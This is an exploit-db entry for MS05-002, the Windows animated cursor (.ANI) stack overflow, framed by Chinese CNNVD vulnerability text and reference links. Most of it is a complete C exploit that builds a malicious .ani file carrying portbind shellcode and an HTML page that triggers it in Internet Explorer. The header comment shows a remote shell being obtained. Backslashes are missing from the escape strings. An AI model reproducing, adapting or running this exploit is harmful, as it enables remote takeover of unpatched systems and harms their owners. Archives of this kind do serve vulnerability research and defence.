https://www.exploit-db.com/exploits/765
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200504-105

MicrosoftWindows是微软发布的很流行的操作系统。WindowsNT、Windows2000throughSP4、WindowsXPthroughSP1和Windows2003中的WindowsAnimatedCursor(ANI)功能使得远程攻击者可以使用AnimationHeaderBlock长度字段，导致栈缓冲区溢出，来执行任意代码。

/* Added string.h /str0ke */
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
 *
 * Copyright (c) 2004-2005 houseofdabus.
 *
 * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
 * (CAN-2004-1049)
 *
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * (universal -- for all affected systems)
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution vulnerability exists in the way that
 *    cursor, animated cursor, and icon formats are handled. An attacker
 *    could try to exploit the vulnerability by constructing a malicious
 *    cursor or icon file that could potentially allow remote code
 *    execution if a user visited a malicious Web site or viewed a
 *    malicious e-mail message. An attacker who successfully exploited
 *    this vulnerability could take complete control of an affected
 *    system.
 *
 * ---------------------------------------------------------------------
 * Patch:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows Server 2003
 *    - Windows XP SP1
 *    - Windows XP SP0
 *    - Windows 2000 SP4
 *    - Windows 2000 SP3
 *    - Windows 2000 SP2
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Linux       : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:>HOD-ms05002-ani-expl.exe poc 7777
 * <...>
 * [*] Creating poc.ani file ... Ok
 * [*] Creating poc.html file ... Ok
 *
 * C:>
 *
 * start IE -> C:poc.html
 *
 * C:>telnet localhost 7777
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:Documents and SettingsAdministratorDesktop>
 *
 * ---------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ANI header */
unsigned char aniheader[] =
"x52x49x46x46x9cx18x00x00x41x43x4fx4ex61x6ex69x68"
"x7cx03x00x00x24x00x00x00x08x00x00x00x08x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"

/* jmp offset, no Jitsu */
"x77x82x40x00xebx64x90x90x77x82x40x00xebx64x90x90"
"xebx54x90x90x77x82x40x00xebx54x90x90x77x82x40x00"
"xebx44x90x90x77x82x40x00xebx44x90x90x77x82x40x00"
"xebx34x90x90x77x82x40x00xebx34x90x90x77x82x40x00"
"xebx24x90x90x77x82x40x00xebx24x90x90x77x82x40x00"
"xebx14x90x90x77x82x40x00xebx14x90x90x77x82x40x00"
"x77x82x40x00x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";


/* portbind shellcode */
unsigned char shellcode[] =
"xebx70x56x33xc0x64x8bx40x30x85xc0x78x0cx8bx40x0c"
"x8bx70x1cxadx8bx40x08xebx09x8bx40x34x8dx40x7cx8b"
"x40x3cx5exc3x60x8bx6cx24x24x8bx45x3cx8bx54x05x78"
"x03xd5x8bx4ax18x8bx5ax20x03xddxe3x34x49x8bx34x8b"
"x03xf5x33xffx33xc0xfcxacx84xc0x74x07xc1xcfx0dx03"
"xf8xebxf4x3bx7cx24x28x75xe1x8bx5ax24x03xddx66x8b"
"x0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5x89x44x24x1c"
"x61xc3xebx3dxadx50x52xe8xa8xffxffxffx89x07x83xc4"
"x08x83xc7x04x3bxf1x75xecxc3x8ex4ex0execx72xfexb3"
"x16x7exd8xe2x73xadxd9x05xcexd9x09xf5xadxa4x1ax70"
"xc7xa4xadx2exe9xe5x49x86x49xcbxedxfcx3bxe7x79xc6"
"x79x83xecx60x8bxecxebx02xebx05xe8xf9xffxffxffx5e"
"xe8x3dxffxffxffx8bxd0x83xeex36x8dx7dx04x8bxcex83"
"xc1x10xe8x9dxffxffxffx83xc1x18x33xc0x66xb8x33x32"
"x50x68x77x73x32x5fx8bxdcx51x52x53xffx55x04x5ax59"
"x8bxd0xe8x7dxffxffxffxb8x01x63x6dx64xc1xf8x08x50"
"x89x65x34x33xc0x66xb8x90x01x2bxe0x54x83xc0x72x50"
"xffx55x24x33xc0x50x50x50x50x40x50x40x50xffx55x14"
"x8bxf0x33xc0x33xdbx50x50x50xb8x02x01x11x5cxfexcc"
"x50x8bxc4xb3x10x53x50x56xffx55x18x53x56xffx55x1c"
"x53x8bxd4x2bxe3x8bxccx52x51x56xffx55x20x8bxf0x33"
"xc9xb1x54x2bxe1x8bxfcx57x33xc0xf3xaax5fxc6x07x44"
"xfex47x2dx57x8bxc6x8dx7fx38xabxabxabx5fx33xc0x8d"
"x77x44x56x57x50x50x50x40x50x48x50x50xffx75x34x50"
"xffx55x08xf7xd0x50xffx36xffx55x10xffx77x38xffx55"
"x28xffx55x0c";

#define SET_PORTBIND_PORT(buf, port)	*(unsigned short *)(((buf)+300)) = (port)

unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";

unsigned char html[] =
"<html>n"
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
"<br>Copyright (c) 2004-2005 .: houseofdabus :.<br><a href =""
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx">"
"Patch (MS05-002)</a>n"
"<script>alert("%s")</script>n<head>nt<style>n"
"tt* {CURSOR: url("%s.ani")}nt</style>n</head>n"
"</html>";


unsigned short
fixx(unsigned short p)
{
	unsigned short r = 0;
	r  = (p & 0xFF00) >> 8;
	r |= (p & 0x00FF) << 8;

return r;
}

void
usage(char *prog)
{
	printf("Usage:n");
	printf("%s <file> <bindport>nn", prog);
	exit(0);
}


int
main(int argc, char **argv)
{
	FILE *fp;
	unsigned short port;
	unsigned char f[256+5] = "";
	unsigned char anib[912] = "";


	printf("n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploitnn");
	printf("tCopyright (c) 2004-2005 .: houseofdabus :.nnn");
	printf("Tested on all affected systems:n");
	printf("   [+] Windows Server 2003n   [+] Windows XP SP1, SP0n");
	printf("   [+] Windows 2000 All SPnn");

	printf("%snn", discl);
	if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
		printf("[-] Size of shellcode must be <= 686 bytesn");
		return 0;
	}
	if (argc < 3) usage(argv[0]);

	if (strlen(argv[1]) > 256) {
		printf("[-] Size of filename must be <=256 bytesn");
		return 0;
	}

	/* creating ani file */
	strcpy(f, argv[1]);
	strcat(f, ".ani");
	printf("[*] Creating %s file ...", f);
	fp = fopen(f, "wb");
	if (fp == NULL) {
		printf("n[-] error: can't create file: %sn", f);
		return 0;
	}
	memset(anib, 0x90, 912);

	/* header */
	memcpy(anib, aniheader, sizeof(aniheader)-1);
	/* shellcode */
	port = atoi(argv[2]);
	SET_PORTBIND_PORT(shellcode, fixx(port));
	memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);

	fwrite(anib, 1, 912, fp);
	printf(" Okn");
	fclose(fp);

	/* creating html file */
	f[0] = '';
	strcpy(f, argv[1]);
	strcat(f, ".html");
	printf("[*] Creating %s file ...", f);
	fp = fopen(f, "wb");
	if (fp == NULL) {
		printf("n[-] error: can't create file: %sn", f);
		return 0;
	}
	sprintf(anib, html, discl, argv[1]);
	fwrite(anib, 1, strlen(anib), fp);
	printf(" Okn");
	fclose(fp);

return 0;
}

// milw0rm.com [2005-01-22]

来源:XF
名称:win-user32-aniheader-overflow(18879)
链接:http://xforce.iss.net/xforce/xfdb/18879
来源:BID
名称:12233
链接:http://www.securityfocus.com/bid/12233
来源:MS
名称:MS05-002
链接:http://www.microsoft.com/technet/Security/bulletin/ms05-002.mspx
来源:MISC
链接:http://eeye.com/html/research/advisories/AD20050111.html
来源:BUGTRAQ
名称:20050112WindowsANIFileParsingProofOfConcept(MS05-002)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110556975827760&w;=2
来源:BUGTRAQ
名称:20050111EEYE:WindowsANIFileParsingBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110547079218397&w;=2